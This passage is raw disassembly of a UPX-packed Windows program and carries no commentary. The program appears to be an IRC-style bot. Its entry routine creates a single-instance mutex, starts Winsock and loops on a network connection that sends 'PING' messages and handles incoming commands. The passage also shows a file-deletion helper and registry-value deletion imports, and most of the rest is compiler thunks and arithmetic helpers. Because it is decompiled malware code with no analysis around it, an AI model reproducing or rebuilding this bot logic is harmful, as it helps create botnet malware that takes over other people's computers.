call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; ---------------------------------------------------------------------------
loc_4167F1: ; CODE XREF: UPX1:00421BF8�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp-18h], esp
push 2
call ds:dword_4170F4 ; SetErrorMode
and dword ptr [ebp-4], 0
push ds:dword_41DB04
push ds:dword_41DB00
push 3B7h
push ds:dword_41DAFC
push 0
push ds:dword_41DAF8
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp-115Ch]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and dword ptr [ebp-1128h], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: UPX0:loc_4168BA�j
mov eax, [ebp-1128h]
inc eax
mov [ebp-1128h], eax
loc_416875: ; CODE XREF: UPX0:00416866�j
cmp dword ptr [ebp-1128h], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: UPX0:0041687C�j
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-115Ch]
push eax
push 0
push 0
call ds:dword_4170F8 ; CreateMutexA
mov [ebp-12F0h], eax
cmp dword ptr [ebp-12F0h], 0
jz short loc_4168BA
call ds:dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: UPX0:004168AC�j
; UPX0:004168B6�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: UPX0:004168B8�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DAF8
call sub_41055F
pop ecx
pop ecx
push 10h
push offset dword_41DAF8
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DAF8
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov ds:dword_41ED00, eax
call sub_410422
mov ds:dword_41ED04, eax
call sub_410422
mov ds:dword_41ED08, eax
call sub_410422
mov ds:dword_41ED0C, eax
push 104h
lea eax, [ebp-1120h]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DF00
push offset dword_41EBFC
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: UPX0:00416949�j
lea eax, [ebp-1120h]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-12F4h], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: UPX0:loc_4169DF�j
mov eax, [ebp-12F4h]
dec eax
mov [ebp-12F4h], eax
loc_416983: ; CODE XREF: UPX0:00416974�j
cmp dword ptr [ebp-12F4h], 0
jnz short loc_41699F
push offset byte_41DF00
push offset dword_41EBFC
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: UPX0:0041698A�j
mov eax, [ebp-12F4h]
movsx eax, byte ptr [ebp+eax-1121h]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp-12F4h]
lea eax, [ebp+eax-1120h]
push eax
push offset dword_41EBFC
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EBFC
push offset dword_41ED10
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: UPX0:004169B0�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: UPX0:0041695C�j
; UPX0:0041699D�j ...
call sub_406E8E
lea eax, [ebp-12ECh]
push eax
push 202h
call ds:dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: UPX0:00416A43�j
; UPX0:00416AA7�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and dword ptr [ebp-101Ch], 0
loc_416A19: ; CODE XREF: UPX0:00416AE2�j
mov dword ptr [ebp-4], 1
loc_416A20: ; CODE XREF: UPX0:loc_416A6F�j
; UPX0:00416AC0�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp dword ptr [ebp-101Ch], 19h
jnz short loc_416A45
and dword ptr [ebp-4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: UPX0:00416A3D�j
cmp dword ptr [ebp-101Ch], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: UPX0:00416A4C�j
mov eax, [ebp-101Ch]
inc eax
mov [ebp-101Ch], eax
loc_416A6F: ; CODE XREF: UPX0:00416A60�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: UPX0:00416A34�j
push 1000h
lea eax, [ebp-1018h]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: UPX0:00416A98�j
and dword ptr [ebp-4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: UPX0:00416AA1�j
and dword ptr [ebp-101Ch], 0
lea eax, [ebp-1018h]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
; ---------------------------------------------------------------------------
loc_416AC5: ; DATA XREF: UPX1:004172A8�o
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_416ADB: ; DATA XREF: UPX1:004172AC�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
jmp loc_416A19
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp ds:dword_41DF08, 0
jz short loc_416B1E
push offset dword_41DE2C
push offset dword_41DB88
call sub_40D4AB
pop ecx
pop ecx
loc_416B1E: ; CODE XREF: UPX0:00416B0B�j
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; sub_4020C2+62�p ...
jmp ds:dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp ds:dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: sub_401244+85�p
; sub_4017AA+22�p ...
jmp ds:dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: sub_401244+25�p
; sub_401244+4DE�p ...
jmp ds:dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: sub_401244+1A�p
; sub_401981+18�p ...
jmp ds:dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp ds:dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; sub_4055E5+231�p ...
jmp ds:dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp ds:dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: sub_401981+145�p
; sub_401981+158�p ...
jmp ds:dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp ds:dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: sub_401E38+1AB�p
; sub_4020C2+1A6�p ...
jmp ds:dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: sub_401E38+179�p
; sub_402698+24C�p ...
jmp ds:dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: sub_401E38+9D�p
; sub_401E38+262�p ...
jmp ds:dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: sub_401E38+42�p
; sub_4020C2+159�p ...
jmp ds:dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: sub_4020C2+2C1�p
; sub_41102F+94�p ...
jmp ds:dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: sub_4020C2+198�p
; sub_4020C2+1BC�p ...
jmp ds:dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp ds:dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp ds:dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp ds:dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; sub_4083AD+3DF�p ...
jmp ds:dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: sub_403DF3+8�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp ds:dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp ds:dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
; UPX0:00416B26�p
jmp ds:dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp ds:dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp ds:dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DBA proc near ; DATA XREF: sub_4093B6+A�o
; sub_4094E6+A�o ...
jmp ds:dword_41715C
sub_416DBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp ds:dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp ds:dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p ...
jmp ds:dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp ds:dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; sub_409DD0+13B�p
jmp ds:dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp ds:dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp ds:dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp ds:dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp ds:dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp ds:dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp ds:dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp ds:dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: UPX0:00416FE2�j
jmp ds:dword_417124
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E10 proc near ; CODE XREF: sub_414EF4+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp ds:dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E40 proc near ; CODE XREF: sub_414EF4+EA�p
; sub_414EF4+1E2�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_416EAF
retn 4
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E4E proc near ; CODE XREF: sub_414EF4+134�p
; sub_414EF4+2D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_41DEA0
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp+var_4]
push eax
push 0
call ds:dword_4171C8
test eax, eax
jz short loc_416EA0
and [ebp+var_4], 0
loc_416EA0: ; CODE XREF: sub_416E4E+D�j
; sub_416E4E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_416EAF
leave
retn 0Ch
sub_416E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: sub_416E40+6�p
; sub_416E4E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; =============== S U B R O U T I N E =======================================
sub_416F05 proc near ; DATA XREF: UPX1:off_4172B4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416F4E
test [esp+4+arg_0], 1
jz short loc_416F1B
push esi
call sub_416DCC
pop ecx
loc_416F1B: ; CODE XREF: sub_416F05+D�j
mov eax, esi
pop esi
retn 4
sub_416F05 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4172B4
jz short loc_416F48
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416F48: ; CODE XREF: UPX0:00416F40�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_416F4E proc near ; CODE XREF: sub_416F05+3�p
; DATA XREF: UPX1:004173BC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4172B4
test eax, eax
jz short loc_416F64
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416F64: ; CODE XREF: sub_416F4E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_416F72
push esi
call ds:dword_4170B0 ; LocalFree
loc_416F72: ; CODE XREF: sub_416F4E+1B�j
pop esi
retn
sub_416F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: sub_401244+120�p
; sub_406E8E+DA�p ...
jmp ds:dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: sub_4020C2+113�p
; sub_4038BA+22F�p ...
jmp ds:dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: sub_402A32+CC�p
; sub_402A32+2B9�p ...
jmp ds:dword_417118
sub_416F80 endp
; =============== S U B R O U T I N E =======================================
sub_416F86 proc near ; DATA XREF: UPX1:off_4172BC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416FA8
test [esp+4+arg_0], 1
jz short loc_416F9C
push esi
call sub_416DCC
pop ecx
loc_416F9C: ; CODE XREF: sub_416F86+D�j
mov eax, esi
pop esi
retn 4
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp ds:dword_41711C
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA8 proc near ; CODE XREF: sub_416F86+3�p
jmp ds:dword_417120
sub_416FA8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0A00h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FBC: ; DATA XREF: UPX1:0041737C�o
lea ecx, [ebp-10h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0DF8h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E14h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FDD: ; DATA XREF: sub_414EF4�o
mov eax, offset dword_417350
jmp loc_416E08
; ---------------------------------------------------------------------------
align 20h
UPX0 ends
; Section 2. (virtual address 00017000)
; Virtual size : 0000B000 ( 45056.)
; Section size in file : 0000B000 ( 45056.)
; Offset to raw data for section: 00017000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 417000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_417000 dd 77DECF4Ah ; resolved to->ADVAPI32.RegEnumValueA ; UPX1:00421AA1�o
dword_417004 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA ; sub_406C51+96�r
